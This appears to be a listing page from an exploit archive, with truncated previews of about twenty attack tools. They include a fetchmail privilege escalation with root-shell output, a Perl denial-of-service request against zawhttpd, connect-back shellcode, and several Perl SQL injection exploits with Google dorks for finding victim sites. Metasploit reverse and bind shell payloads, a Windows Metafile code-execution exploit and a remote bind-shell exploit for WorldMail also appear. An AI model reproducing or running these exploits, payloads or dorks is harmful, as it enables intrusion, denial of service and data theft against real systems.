Mac OS X <= 10.4.7 fetchmail Privilege Escalation Exploit (x86)
Exploit for macOS platform in category local exploits =============================================================== Mac OS X kevin-finisterres-mac-mini: kfinisterre$ /usr/bin/fetchmail -p pop3 --fastuidl 1 localhost -P 1234 Enter password for email protected: sh-2.05b$ id uid=501kfinisterre...
newscientist.txt
We from Black Box Magazine - Underground Inet-Security Research -- http://bboxnet.mine.nu found Cross Site Scripting Vuln in http://www.newscientist.com/ Write this example in Search: "...
radlance.txt
Discovered And Coded By Mr.CrackerZ Exploit Code !/usr/bin/perl Discovered and coded by Mr.CrackerZ Security Team Contact me [email protected] Usage: radlance.pl Google: Powered by: RadLance Gold v7 Tested Under RadLance Gold v7 Local Inclusion Exploit Example:...
zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS
Exploit for linux platform in category dos / poc =================================================== zawhttpd new PeerAddr = $ARGV0, PeerPort = $ARGV1, Proto = "TCP" print "Attempting to kill zawhttpd at $ARGV0:$ARGV1 ..."; print $socket "GET \\\\\\\\\\ HTTP/1.0\r\n\r\n"; close$socket;...
linux/amd64 - connect-back semi-stealth shellcode 88+ bytes
linux/amd64 connect-back semi-stealth shellcode 88+ bytes. Shellcode exploit for linamd64 platform include include include include include include include / usual rant here.. this is just a doodle.. i was curious about the amd64 and since i dont think a simple exec /bin/sh is worth releasing i gi...
FlexBB 0.5.5 - '/inc/start.php?_COOKIE' SQL Bypass
!/usr/bin/perl -w FlexBB : DONT FORGET TO DO YOUR CONFIG !! DONT FORGET TO DO YOUR CONFIG !! DONT FORGET TO DO YOUR CONFIG !! use IO::Socket; -- Start -- $host = "127.0.0.1"; $path = "/flexbb/"; -- END -- $host :- The Host Name Without http:// | exm. www.vic.com $path :- FlexBB Dir On Server | ex...
CVE-2006-1240
Buffer overflow in inetserver.cpp in (1) fbinetserver and (2) fbserver in Firebird 1.5.2.4731 allows local users to gain privileges via a long value of the -p argument...
CilemNews System 1.1 - yazdir.asp haber_id SQL Injection
CilemNews System 1.1 - yazdir.asp haberid SQL Injection !/usr/bin/perl Method found & Exploit scripted by nukedx Contacts ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com Usage: cilem.pl Original Advisory: http://www.nukedx.com/?viewdoc=10 googledork inurl:yazdir.asp?haberid= 2.140...
D2-Shoutbox 4.2 IPB Mod - load SQL Injection
D2-Shoutbox 4.2 IPB Mod - load SQL Injection !/usr/bin/perl | | | \ | | |/ D2-Shoutbox 4.2IPB Mod=SQL injection Created By SkOd SED security Team http://www.sed-team.be [email protected] ISRAEL google: "Powered By D2-Shoutbox 4.2" use IO::Socket; $host = $ARGV0; $user = $ARGV2; $uid = $ARGV3; $pi...
D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl | | | \ | | |/ D2-Shoutbox 4.2IPB Mod=SQL injection Created By SkOd SED security Team http://www.sed-team.be [email protected] ISRAEL google: "Powered By D2-Shoutbox 4.2" use IO::Socket; $host = $ARGV0; $user = $ARGV2; $uid = $ARGV3; $pid = $ARGV4...
WorldMail-3.0.pl.txt
Eudora WorldMail 3.0 Windows 2000 Remote System Exploit November 2005 Tested on Windows 2000 Server SP4 infoATcom-winner.com http://www.com-winner.com http://www.com-winner.com/CWCOM/cwc-index/ use IO::Socket::INET; use strict; win32bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub...
Phpclanwebsite 1.23.1 - SQL Injection
!perl Phpclanwebsite 1.23.1 SQL injection exploit by matrixkiller Greets to all omega-team membersand specially to EcLiPsE and also to h4cky0uh4cky0u.org, Alpha-Fan, Chameleon and all my friends The exploit was tested on phpclan's website and it worked + my local server and on ra4ev.com But on...
Unix Command Shell, Reverse TCP (via Perl)
Creates an interactive shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 234 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def initializeinfo...
Unix Command Shell, Bind TCP (via Perl)
Listen for a connection and spawn a command shell via perl This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 240 include Msf::Payload::Single include Msf::Sessions::CommandShellOptio...
ie_xp_pfv_metafile.pm.txt
This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artistic. The latest version of the...
Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)
Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit). This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the cor...
Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC
Exploit for unknown platform in category remote exploits ============================================================ Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC ============================================================ Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croc...
Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC
No description provided by source. Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC How to use: 1. Run this script to setup the fake web server. 2. Scan the server with AppScan QA, either in Interactive or Manual mode. 3. If you get an "You are vulnerable!" popup, you should...
redhat Interchange
It seems that SPDX-FileCopyrightText: 2005 Michel Arboi Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only Note: this service is not a web server, but it looks like it for findservice HEAD...
redhat Interchange
It seems that 'Red Hat Interchange' ecommerce and dynamic content management application is running in 'Inet' mode on this port. Versions 4.8.5 and earlier are flawed and may disclose contents of sensitive files to attackers. OpenVAS neither checked Interchange version nor tried to exploit the...